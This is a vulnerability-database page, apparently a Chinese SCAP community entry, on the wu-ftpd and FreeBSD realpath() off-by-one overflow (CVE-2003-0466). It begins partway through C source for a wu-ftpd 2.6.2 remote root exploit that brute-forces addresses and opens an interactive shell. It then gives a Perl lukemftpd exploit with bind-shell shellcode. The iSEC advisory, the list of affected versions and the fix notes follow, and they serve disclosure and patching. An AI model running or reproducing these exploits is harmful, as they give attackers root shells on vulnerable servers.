		*(long *)&atk_bf[r_rn_1]=0x41414141;
		r_rn_1+=(DEF_ALIGN);
		*(long *)&atk_bf[r_rn_1]=0x0d414141;
		r_rn_1+=(DEF_ALIGN);
		atk_bf[r_rn_1++]=(0x0a);
	}
	send(sock,atk_bf,strlen(atk_bf),(NRL));
	(u_int)sleep(SCS);
	memset((char *)get_nm,(NRL),sizeof(get_nm));
	recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

	if(type) /* MKD command */
	{
		if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
		{
			fprintf(stdout," [-] MKD &shellcode_dir failed.\n\n");
			exit(FAD);
		}
		else fprintf(stdout," [+] Ok, MKD &shellcode_dir.\n");
	}
	else /* RMD command */
	{
		if(!strstr(get_nm,(CWD_COMM_SCS)))
		{
			fprintf(stdout," [-] RMD &shellcode_dir failed.\n\n");
			exit(FAD);
		}
		else fprintf(stdout," [+] Ok, RMD &shellcode_dir.\n");
	}
	return;
}

int main(int argc,char *argv[])
{
	int opt_g,sock,__bf=(NRL);
	int mx_bf=(MAX_BF),bf_lsz=(BF_LSZ);
	char user_id[(DEF_VA)]=(DEF_STR);
	char pass_wd[(DEF_VA)]=(DEF_STR);
	char tg_host[(DEF_VA)]=(DEF_HOST);
	int tg_port=(DEF_PORT);
	u_long sh_addr=(plat[t_g].sh_addr);

	(void)banrl();
while((opt_g=getopt(argc,argv,"QqCcM:m:H:h:U:u:P:p:N:n:S:s:T:t:B:b:Ii"))!=EOF)
	{
		extern char *optarg;
		switch(opt_g)
		{
			case 'Q':
			case 'q':
				fprintf(stdout," [*] Banner scan mode.\n");
				b_scan=(SCS);
				break;
				
			case 'C':
			case 'c':
				fprintf(stdout," [*] Check exploit test mode.\n");
				__exp_test=(SCS);
				break;

			case 'M':
			case 'm':
				mx_bf=(atoi(optarg));
				bf_lsz=((0x1000)/mx_bf);
				break;

			case 'H':
			case 'h':
				memset((char *)tg_host,(NRL),sizeof(tg_host));
				strncpy(tg_host,optarg,sizeof(tg_host)-1);
				break;
				
			case 'U':
			case 'u':
				memset((char *)user_id,(NRL),sizeof(user_id));
				strncpy(user_id,optarg,sizeof(user_id)-1);
				break;
				
			case 'P':
			case 'p':
			memset((char *)pass_wd,(NRL),sizeof(pass_wd));
				strncpy(pass_wd,optarg,sizeof(pass_wd)-1);
				break;
				
			case 'N':
			case 'n':
				tg_port=(atoi(optarg));
				break;
				
			case 'S':
			case 's':
				sh_addr=strtoul(optarg,(NRL),(NRL));
				break;
				
			case 'T':
			case 't':
				if((t_g=(atoi(optarg)))<(9))
					sh_addr=(plat[t_g].sh_addr);
				else (void)prcode_usage(argv[(NRL)]);
				break;
				
			case 'B':
			case 'b':
				if((t_g=(atoi(optarg)))<(9))
				{
					sh_addr=(plat[t_g].bf_addr);
					__bf=(SCS);
				}
				else (void)prcode_usage(argv[(NRL)]);
				break;
				
			case 'I':
			case 'i':
				(void)prcode_usage(argv[(NRL)]);
				break;
				
			case '?':
				(void)prcode_usage(argv[(NRL)]);
				break;
		}
	}
	if(!strcmp(user_id,(DEF_STR))||!strcmp(pass_wd,(DEF_STR)))
		(void)prcode_usage(argv[(NRL)]);
	
	memset((char *)home_dir,(NRL),sizeof(home_dir));
	snprintf(home_dir,sizeof(home_dir)-1,"%s%s",(plat[t_g].home),user_id);

	if(!__bf)
	{
		fprintf(stdout," [*] Target: %s.\n",(plat[t_g].v_nm));
		sh_addr=(u_long)null_chk(sh_addr);
		fprintf(stdout," [+] address: %p.\n",sh_addr);
		fprintf(stdout," [*] #1 Try, %s:%d ...",tg_host,tg_port);
		fflush(stdout);

		sock=(int)setsock(tg_host,tg_port);
		(void)re_connt(sock);
		fprintf(stdout," [ OK ]\n");

		fprintf(stdout," [1] ftpd connection login.\n");
		(void)ftpd_login(sock,user_id,pass_wd);

		fprintf(stdout," [2] send exploit code.\n");
		(void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
		close(sock);

		fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
		fflush(stdout);

		sock=(int)setsock(tg_host,tg_port);
		(void)re_connt(sock);
		fprintf(stdout," [ OK ]\n");

		fprintf(stdout," [3] ftpd connection login.\n");
		(void)ftpd_login(sock,user_id,pass_wd);

		fprintf(stdout," [4] send exploit code.\n");
		(void)make_send_exploit(sock,(NRL),sh_addr,(NRL));

		fprintf(stdout," [5] Waiting, execute the shell ");
		fflush(stdout);
		(u_int)sleep(SCS);
		
		fprintf(stdout,".");
		fflush(stdout);
		(u_int)sleep(SCS);
		
		fprintf(stdout,".");
		fflush(stdout);
		(u_int)sleep(SCS);

		fprintf(stdout,".\n");
		(void)conn_shell(sock,sh_addr);
		close(sock);
	}
	else
	{
		int bt_num=(NRL);
		fprintf(stdout," [*] Brute-Force mode.\n");
		fprintf(stdout," [+] BF Count: %d.\n",mx_bf);
		fprintf(stdout," [+] BF Size: +%d.\n\n",bf_lsz);

		for(bt_num=(NRL);bt_num<(mx_bf);bt_num++)
		{
			sh_addr=(u_long)null_chk(sh_addr);
			fprintf(stdout," [+] Brute-Force address: %p.\n",sh_addr);
			fprintf(stdout," [*] #1 Try, %s:%d ...",tg_host,tg_port);
			fflush(stdout);
			
			sock=(int)setsock(tg_host,tg_port);
			(void)re_connt(sock);
			fprintf(stdout," [ OK ]\n");
			
			fprintf(stdout," [1] ftpd connection login.\n");
			(void)ftpd_login(sock,user_id,pass_wd);
			
			fprintf(stdout," [2] send exploit code.\n");
			if(bt_num==(NRL))
			{
			(void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
			}
			else
			{
			(void)make_send_exploit(sock,(SCS),sh_addr,(NRL));
			}
			close(sock);
			
			fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
			fflush(stdout);
			
			sock=(int)setsock(tg_host,tg_port);
			(void)re_connt(sock);
			fprintf(stdout," [ OK ]\n");
			
			fprintf(stdout," [3] ftpd connection login.\n");
			(void)ftpd_login(sock,user_id,pass_wd);
			
			fprintf(stdout," [4] send exploit code.\n");
			(void)make_send_exploit(sock,(NRL),sh_addr,(NRL));
			
			fprintf(stdout," [5] Waiting, execute the shell ");
			fflush(stdout);
			(u_int)sleep(SCS);

			fprintf(stdout,".");
			fflush(stdout);
			(u_int)sleep(SCS);
			
			fprintf(stdout,".");
			fflush(stdout);
			(u_int)sleep(SCS);
			
			fprintf(stdout,".\n");
			(void)conn_shell(sock,sh_addr);
			close(sock);

			sh_addr+=(bf_lsz);
		}
	}
	exit(NRL);
}

int setsock(char *u_host,int u_port)
{
	int sock;
	struct hostent *sxp;
	struct sockaddr_in sxp_addr;
 
	if((sxp=gethostbyname(u_host))==(GET_HOST_NM_ERR))
	{
		return(FAD);
	}
	if((sock=socket(AF_INET,SOCK_STREAM,(NRL)))==(FAD))
	{
		return(FAD);
	}
	sxp_addr.sin_family=AF_INET;
	sxp_addr.sin_port=htons(u_port);
	sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
	bzero(&(sxp_addr.sin_zero),(SIN_ZR_SIZE));

	if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==(FAD))
	{
		return(FAD);
	}
	return(sock);
}

void conn_shell(int conn_sock,u_long scs_addr)
{
	int died;
	int ex_t=(NRL);
	char *command,readbuf[(GET_R)];
	fd_set rset;

	switch(t_g)
	{
		case 0:
		case 1:
		case 2:
		case 3:
		case 4:
		case 5:
			command=(DEF_COMM);
			break;
		case 6:
		case 7:
		case 8:
			command=(DEF_COMM_OB);
			break;
	}
	memset((char *)readbuf,(NRL),sizeof(readbuf));
	fprintf(stdout," [*] Send, command packet !\n\n");
	send(conn_sock,command,strlen(command),(NRL));

	for(;;)
	{
		fflush(stdout);
		FD_ZERO(&rset);
		FD_SET(conn_sock,&rset);
		FD_SET(STDIN_FILENO,&rset);
		select(conn_sock+1,&rset,NULL,NULL,NULL);

		if(FD_ISSET(conn_sock,&rset))
		{
			died=read(conn_sock,readbuf,sizeof(readbuf)-1);
			if(died<=(NRL))
			{
				if(!ex_t)
				{
				fprintf(stderr," [-] exploit failure.\n\n");
					return;
				}
				else
				{
	fprintf(stdout," [*] exploit successfully ! (&shellcode_addr: %p)\n\n",scs_addr);
					exit(NRL);
				}
			}
			readbuf[died]=(NRL);
			fprintf(stdout,"%s",readbuf);
		}
		if(FD_ISSET(STDIN_FILENO,&rset))
		{
			died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
			if(died>(NRL))
			{
				readbuf[died]=(NRL);
				if(strstr(readbuf,"exit"))
					ex_t=(SCS);
				write(conn_sock,readbuf,died);
			}
		}
	}
	return;
}

void re_connt(int st_sock_va)
{
	if(st_sock_va==(FAD))
	{
		fprintf(stdout," [ Fail ]\n\n");
		exit(FAD);
	}
}

void banrl()
{
fprintf(stdout,"\n 0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.\n\n");
}

int check_exp(int sock)
{
	int conn_died;
	char gt_bf[(GET_R)];

	fprintf(stdout,"\n [+] Check exploit test ...\n");
	send(sock,"X82\r\n",strlen("X82\r\n"),(NRL)); /* test packet */
	(u_int)sleep(SCS);
	memset((char *)gt_bf,(NRL),sizeof(gt_bf));
	conn_died=read(sock,gt_bf,sizeof(gt_bf)-1);

	if(strstr(gt_bf,(CMD_ERROR)))
	{
		fprintf(stdout," [X] After test exploit, wu-ftpd is alive.\n");
		return(FAD);
	}
	else if(conn_died<=(NRL))
	{
		fprintf(stdout," [*] Ok, This is vulnerable version.\n\n");
		return(SCS);
	}
	else return(FAD);
}

/* eoc */		

- 漏洞信息 (22976)

freeBSD 4.8 realpath() Off-By-One Buffer Overflow Vulnerability (EDBID:22976)
freebsd remote
2003-07-31 Verified
0 daniels@legend.co.uk
N/A [点击下载]
source: http://www.securityfocus.com/bid/8315/info
  
The 'realpath()' function is a C-library procedure to resolve the canonical, absolute pathname of a file based on a path that may contain values such as '/', './', '../', or symbolic links. A vulnerability that was reported to affect the implementation of 'realpath()' in WU-FTPD has lead to the discovery that at least one implementation of the C library is also vulnerable. FreeBSD has announced that the off-by-one stack- buffer-overflow vulnerability is present in their libc. Other systems are also likely vulnerable.
  
Reportedly, this vulnerability has been successfully exploited against WU-FTPD to execute arbitrary instructions.
  
NOTE: Patching the C library alone may not remove all instances of this vulnerability. Statically linked programs may need to be rebuilt with a patched version of the C library. Also, some applications may implement their own version of 'realpath()'. These applications would require their own patches. FreeBSD has published a large list of applications that use 'realpath()'. Administrators of FreeBSD and other systems are urged to review it. For more information, see the advisory 'FreeBSD-SA-03:08.realpath'.

#!/usr/bin/perl

#realpath lukemftpd remote exploit for freeBSD 4.8
#i managed to code this, and lose the first copy, hence a re-write :(
#deadbeat,
#left without any return addresses/offsets purposely to stop kids using it..
#want the rets/offsets? heh..
#
#tested on freeBSD 4.8 and it worked ;) it worked ;)
#e: daniels@legend.co.uk
#e: deadbeat@sdf.lonestar.org

use IO::Socket;

$user = $ARGV[0];
$pass = $ARGV[1];
$ret = $ARGV[2];
$offset = $ARGV[3];
$host = $ARGV[4];
$buf= 1024;
$n = "./";
print "lukemftpd remote for FreeBSD 4.8 ..\n";
print "this is the kiddiot version, go grab them ret's+offsets..lool\n";
print "contact me and i might give u the rets/offsets\n";
if(!$ARGV[4]){
	die "Usage: perl $0 <user> <pass> <ret> <offset> <host>\n";
}
sub brute_force
{
	$r = $_[0];
	$o = $_[1];

		#shellcode from zillion.. from safemode.org...binds /bin/sh on 41254
	$hell =	"\xeb\x64\x5e\x31\xc0\x88\x46\x07\x6a\x06\x6a\x01\x6a\x02\xb0".
        		"\x61\x50\xcd\x80\x89\xc2\x31\xc0\xc6\x46\x09\x02\x66\xc7\x46".
        		"\x0a\xa1\x26\x89\x46\x0c\x6a\x10\x8d\x46\x08\x50\x52\x31\xc0".
        		"\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31\xc0\xb0\x6a\x50\xcd\x80".
        		"\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff\xff".
        		"\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01".
        		"\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\x97\xff".
        		"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23";

	$addr = pack('l', ($r+$o));
	for($i=0;$i <$buf; $i +=4){
		$buffer .=$addr;
	}
	for($i=0;$i<$buf - length($hell) /2;$i++){
		$buffer .=$n;
	}
	$buffer .=$hell;

	print "Connecting to: $host\n";
	$sox = IO::Socket::INET->new(
		Proto=>"tcp",
		PeerPort=>"21",
		PeerAddr=>"$host"
	)or die "cant connect to $host ...maybe try a real host ;)\n";
	sleep 1;
	print ("[+]Trying addr: 0x", sprintf('%lx', ($r + $o)),"\n");
	print $sox "user $user\r\n";
	sleep 1;
	print "pass $pass\r\n";
	sleep 1;
	print $sox "MLST $buffer\r\n";
	sleep 2;
	close $sox;
	print "Trying to connect to r00tshell\n";
	$sox = IO::Socket::INET->new(
		Proto=>"tcp",
		PeerPort=>"41254",
		PeerAddr=>"$host"
	)or die"No r00tshell this time, try using a proper offset/ret_addr..\n";
	print "Wicked we got a r00tshell on $host : 41254\n\n";
	close $sox;
}

for($a=0;$a<1000;$a++){
	$offset++;
	$reta = pack('l', ($ret+$o));
	print "Brute Force [$a]\n";
	brute_force($reta,$offset);
}
		

- 漏洞信息 (F31479)

isec-0011-wu-ftpd.txt (PacketStormID:F31479)
2003-08-05 00:00:00
Wojciech Purczynski,Janusz Niewiadomski  
advisory,remote,local,root
CVE-2003-0466
[点击下载]

wu-ftpd versions 2.5.0 to 2.6.2 have been found to be susceptible to an off-by-one bug in fb_realpath(). A local or remote attacker could exploit this vulnerability to gain root privileges on a vulnerable system.

Synopsis:	wu-ftpd fb_realpath() off-by-one bug
Product:	wu-ftpd
Version: 	2.5.0 <= 2.6.2
Vendor:		http://www.wuftpd.org/

URL:		http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
CVE:            http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0466
Author:		Wojciech Purczynski <cliph@isec.pl>
		Janusz Niewiadomski <funkysh@isec.pl>
Date:		July 31, 2003 


Issue:
======

Wu-ftpd FTP server contains remotely exploitable off-by-one bug. A local
or remote attacker could exploit this vulnerability to gain root
privileges on a vulnerable system.


Details:
========

An off-by-one bug exists in fb_realpath() function. An overflow occurs
when the length of a constructed path is equal to the MAXPATHLEN+1
characters while the size of the buffer is MAXPATHLEN characters only.
The overflowed buffer lies on the stack.

The bug results from misuse of rootd variable in the calculation of
length of a concatenated string:

------8<------cut-here------8<------
    /*
     * Join the two strings together, ensuring that the right thing
     * happens if the last component is empty, or the dirname is root.
     */
    if (resolved[0] == '/' && resolved[1] == '\0')
        rootd = 1;
    else
        rootd = 0;

    if (*wbuf) {
        if (strlen(resolved) + strlen(wbuf) + rootd + 1 > MAXPATHLEN) {
            errno = ENAMETOOLONG;
            goto err1;
        }
        if (rootd == 0)
            (void) strcat(resolved, "/");
        (void) strcat(resolved, wbuf);
    }
------8<------cut-here------8<------

Since the path is constructed from current working directory and a file
name specified as an parameter to various FTP commands attacker needs to
create deep directory structure.

Following FTP commands may be used to cause buffer overflow:

	STOR
	RETR
	APPE
	DELE
	MKD
	RMD
	STOU
	RNTO

This bug may be non-exploitable if size of the buffer is greater than
MAXPATHLEN characters. This may occur for example if wu-ftpd is compiled
with some versions of Linux kernel where PATH_MAX (and MAXPATHLEN 
accordingly) is defined to be exactly 4095 characters. In such cases,
the buffer is padded with an extra byte because of variable alignment 
which is a result of code optimization.

Linux 2.2.x and some early 2.4.x kernel versions defines PATH_MAX to be 
4095 characters, thus only wu-ftpd binaries compiled on 2.0.x or later 2.4.x
kernels are affected.


Exploit:
========

We investigated and successfully exploited this vulnerability on x86 based
Linux system running 2.4.19 kernel. We believe that exploitation of other
little-endian systems is also possible.
 

Impact:
=======

Authenticated local user or anonymous FTP user with write-access could
execute arbitrary code with root privileges.


Vendor Status:
==============

June  1, 2003	security@wu-ftpd.org has been notified
June  9, 2003	Request for confirmation of receipt sent to security@wu-ftpd.org
June 11, 2003	Response received from Kent Landfield
July  3, 2003   Request for status update sent
July 19, 2003	vendor-sec list notified
July 31, 2003	Coordinated public disclosure


The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2003-0466 to this issue.

-- 
Janusz Niewiadomski
iSEC Security Research
http://isec.pl/


    

- 漏洞信息

2133
WU-FTPD fb_realpath() Function Off-by-one Error
Local Access Required, Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A local off-by-one overflow exists in WU-FTPD. The fb_realpath() function fails to validate user input resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2003-07-31 Unknow
2003-08-04 Unknow

- 解决方案

Upgrade to version 2.6.2-12 (Available on some Linux distributions) or higher, as it has been reported to fix this vulnerability. In addition, WU-FTPD Development Group has released a patch for some older versions of the primary distribution.

- 相关参考

- 漏洞作者

- 漏洞信息

Multiple Vendor C Library realpath() Off-By-One Buffer Overflow Vulnerability
Boundary Condition Error 8315
Yes No
2003-07-31 12:00:00 2007-05-15 07:08:00
Discovery of this vulnerability has been credited to Janusz Niewiadomski <funkysh@isec.pl> and Wojciech Purczynski <cliph@isec.pl>.

- 受影响的程序版本

Washington University wu-ftpd 2.6.2
+ Compaq Tru64 5.1 b PK2 (BL22)
+ Compaq Tru64 5.1 b PK1 (BL1)
+ Compaq Tru64 5.1 b
+ Compaq Tru64 5.1 a PK5 (BL23)
+ Compaq Tru64 5.1 a PK4 (BL21)
+ Compaq Tru64 5.1 a PK3 (BL3)
+ Compaq Tru64 5.1 a PK2 (BL2)
+ Compaq Tru64 5.1 a PK1 (BL1)
+ Compaq Tru64 5.1 a
+ Compaq Tru64 5.1 PK6 (BL20)
+ Compaq Tru64 5.1 PK5 (BL19)
+ Compaq Tru64 5.1 PK4 (BL18)
+ Compaq Tru64 5.1 PK3 (BL17)
+ Compaq Tru64 5.1
+ Compaq Tru64 5.0 f
+ Compaq Tru64 5.0 a PK3 (BL17)
+ Compaq Tru64 5.0 a
+ Compaq Tru64 5.0 PK4 (BL18)
+ Compaq Tru64 5.0 PK4 (BL17)
+ Compaq Tru64 5.0
+ Compaq Tru64 4.0 g PK3 (BL17)
+ Compaq Tru64 4.0 g
+ Compaq Tru64 4.0 f PK7 (BL18)
+ Compaq Tru64 4.0 f PK6 (BL17)
+ Compaq Tru64 4.0 f
+ Compaq Tru64 4.0 e
+ Compaq Tru64 4.0 d PK9 (BL17)
+ Compaq Tru64 4.0 d
+ Compaq Tru64 4.0 b
+ Conectiva Linux 9.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ SCO Open Server 5.0.7
+ SCO Open Server 5.0.6 a
+ SCO Open Server 5.0.6
+ Sun Linux 5.0.7
+ Turbolinux Turbolinux Advanced Server 6.0
+ Turbolinux Turbolinux Server 6.1
+ Turbolinux Turbolinux Workstation 6.0
Washington University wu-ftpd 2.6.1
+ Caldera OpenLinux 2.3
+ Caldera OpenLinux Server 3.1
+ Cobalt Qube 1.0
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
- FreeBSD FreeBSD 5.0 alpha
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ Mandriva Linux Mandrake 7.0
+ Mandriva Linux Mandrake 6.1
+ Mandriva Linux Mandrake 6.0
+ RedHat Linux 7.2 noarch
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i586
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 athlon
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 noarch
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i686
+ RedHat Linux 7.1 i586
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
- S.u.S.E. Linux 7.3
- S.u.S.E. Linux 7.2
- S.u.S.E. Linux 7.1 x86
- S.u.S.E. Linux 7.1 sparc
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ SCO Open Server 5.0.6 a
+ SCO Open Server 5.0.6
+ SCO Open Server 5.0.5
+ SCO Open Server 5.0.4
+ SCO Open Server 5.0.3
+ SCO Open Server 5.0.2
+ SCO Open Server 5.0.1
+ SCO Open Server 5.0
- Slackware Linux 8.0
- Slackware Linux 7.1
- Slackware Linux 7.0
+ Turbolinux Turbolinux 6.0.5
+ Turbolinux Turbolinux 6.0.4
+ Turbolinux Turbolinux 6.0.3
+ Turbolinux Turbolinux 6.0.2
+ Turbolinux Turbolinux 6.0.1
+ Turbolinux Turbolinux 6.0
+ Turbolinux Turbolinux Workstation 6.1
+ Wirex Immunix OS 7.0 -Beta
+ Wirex Immunix OS 7.0
+ Wirex Immunix OS 7+
Washington University wu-ftpd 2.6 .0
+ Cobalt Qube 1.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux 4.2
+ Conectiva Linux 4.1
+ Conectiva Linux 4.0 es
+ Conectiva Linux 4.0
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3
+ HP HP-UX 11.11
+ HP HP-UX 11.0
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ RedHat Linux 6.1 sparc
+ RedHat Linux 6.1 i386
+ RedHat Linux 6.1 alpha
+ RedHat Linux 6.0 sparc
+ RedHat Linux 6.0 alpha
+ RedHat Linux 6.0
+ RedHat Linux 5.2 sparc
+ RedHat Linux 5.2 i386
+ RedHat Linux 5.2 alpha
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 6.4 ppc
+ S.u.S.E. Linux 6.4 alpha
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.3 ppc
+ S.u.S.E. Linux 6.3 alpha
+ S.u.S.E. Linux 6.3
+ S.u.S.E. Linux 6.2
+ S.u.S.E. Linux 6.1 alpha
+ S.u.S.E. Linux 6.1
+ Turbolinux Turbolinux 4.0
+ Wirex Immunix OS 6.2
Washington University wu-ftpd 2.5 .0
+ Caldera OpenLinux 2.4
+ Caldera OpenLinux Desktop 2.3
+ RedHat Linux 6.0 sparc
+ RedHat Linux 6.0 alpha
+ RedHat Linux 6.0
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ SCO eServer 2.3
Sun Solaris 9_x86
Sun Solaris 9
SSH Communications Security SSH2 3.2.9 .1
RedHat wu-ftpd-2.6.2-8.i386.rpm
+ RedHat Linux 8.0 i386
RedHat wu-ftpd-2.6.2-5.i386.rpm
+ RedHat Linux 7.3 i386
RedHat wu-ftpd-2.6.1-18.ia64.rpm
+ RedHat Linux 7.2 ia64
RedHat wu-ftpd-2.6.1-18.i386.rpm
+ RedHat Linux 7.2 i386
RedHat wu-ftpd-2.6.1-16.ppc.rpm
+ RedHat Linux 7.1 pseries
+ RedHat Linux 7.1 iseries
RedHat wu-ftpd-2.6.1-16.i386.rpm
+ RedHat Linux 7.1 i386
OpenBSD OpenBSD 2.9
OpenBSD OpenBSD 2.8
OpenBSD OpenBSD 2.7
OpenBSD OpenBSD 2.6
OpenBSD OpenBSD 2.5
OpenBSD OpenBSD 2.4
OpenBSD OpenBSD 2.3
OpenBSD OpenBSD 2.2
OpenBSD OpenBSD 2.1
OpenBSD OpenBSD 2.0
OpenBSD OpenBSD 3.3
OpenBSD OpenBSD 3.2
OpenBSD OpenBSD 3.1
OpenBSD OpenBSD 3.0
NetBSD NetBSD 1.6.1
NetBSD NetBSD 1.6
NetBSD NetBSD 1.5.3
NetBSD NetBSD 1.5.2
NetBSD NetBSD 1.5.1
NetBSD NetBSD 1.5
HP HP-UX 11.22
HP HP-UX 11.11
HP HP-UX 11.0
FreeBSD FreeBSD 5.0 alpha
FreeBSD FreeBSD 5.0
FreeBSD FreeBSD 4.8 -PRERELEASE
FreeBSD FreeBSD 4.8
FreeBSD FreeBSD 4.7 -STABLE
FreeBSD FreeBSD 4.7 -RELEASE
FreeBSD FreeBSD 4.7
FreeBSD FreeBSD 4.6.2
FreeBSD FreeBSD 4.6 -STABLE
FreeBSD FreeBSD 4.6 -RELEASE
FreeBSD FreeBSD 4.6
FreeBSD FreeBSD 4.5 -STABLEpre2002-03-07
FreeBSD FreeBSD 4.5 -STABLE
FreeBSD FreeBSD 4.5 -RELEASE
FreeBSD FreeBSD 4.5
FreeBSD FreeBSD 4.4 -STABLE
FreeBSD FreeBSD 4.4 -RELENG
FreeBSD FreeBSD 4.4
FreeBSD FreeBSD 4.3 -STABLE
FreeBSD FreeBSD 4.3 -RELENG
FreeBSD FreeBSD 4.3 -RELEASE
FreeBSD FreeBSD 4.3
FreeBSD FreeBSD 4.2 -STABLEpre122300
FreeBSD FreeBSD 4.2 -STABLEpre050201
FreeBSD FreeBSD 4.2 -STABLE
FreeBSD FreeBSD 4.2 -RELEASE
FreeBSD FreeBSD 4.2
FreeBSD FreeBSD 4.1.1 -STABLE
FreeBSD FreeBSD 4.1.1 -RELEASE
FreeBSD FreeBSD 4.1.1
FreeBSD FreeBSD 4.1
FreeBSD FreeBSD 4.0 .x
FreeBSD FreeBSD 4.0 alpha
FreeBSD FreeBSD 4.0
FreeBSD FreeBSD 3.5.1 -STABLEpre2001-07-20
Apple Mac OS X Server 10.2.6
Apple Mac OS X 10.2.6

- 漏洞讨论

The 'realpath()' function is a C-library procedure to resolve the canonical, absolute pathname of a file based on a path that may contain values such as '/', './', '../', or symbolic links. A vulnerability that was reported to affect the implementation of 'realpath()' in WU-FTPD has lead to the discovery that at least one implementation of the C library is also vulnerable. FreeBSD has announced that the off-by-one stack- buffer-overflow vulnerability is present in their libc. Other systems are also likely vulnerable.

Reportedly, this vulnerability has been successfully exploited against WU-FTPD to execute arbitrary instructions.

NOTE: Patching the C library alone may not remove all instances of this vulnerability. Statically linked programs may need to be rebuilt with a patched version of the C library. Also, some applications may implement their own version of 'realpath()'. These applications would require their own patches. FreeBSD has published a large list of applications that use 'realpath()'. Administrators of FreeBSD and other systems are urged to review it. For more information, see the advisory 'FreeBSD-SA-03:08.realpath'.

- 漏洞利用

The following exploits are available.

- 解决方案

Please see the referenced vendor advisories for further information.


RedHat wu-ftpd-2.6.1-18.i386.rpm

RedHat wu-ftpd-2.6.1-16.i386.rpm

OpenBSD OpenBSD 3.2

RedHat wu-ftpd-2.6.1-16.ppc.rpm

RedHat wu-ftpd-2.6.1-18.ia64.rpm

RedHat wu-ftpd-2.6.2-8.i386.rpm

RedHat wu-ftpd-2.6.2-5.i386.rpm

Sun Solaris 9

OpenBSD OpenBSD 3.3

Sun Solaris 9_x86

NetBSD NetBSD 1.5

NetBSD NetBSD 1.5.1

NetBSD NetBSD 1.5.2

NetBSD NetBSD 1.5.3

NetBSD NetBSD 1.6

NetBSD NetBSD 1.6.1

Apple Mac OS X Server 10.2.6

Apple Mac OS X 10.2.6

Washington University wu-ftpd 2.6 .0

Washington University wu-ftpd 2.6.1

Washington University wu-ftpd 2.6.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站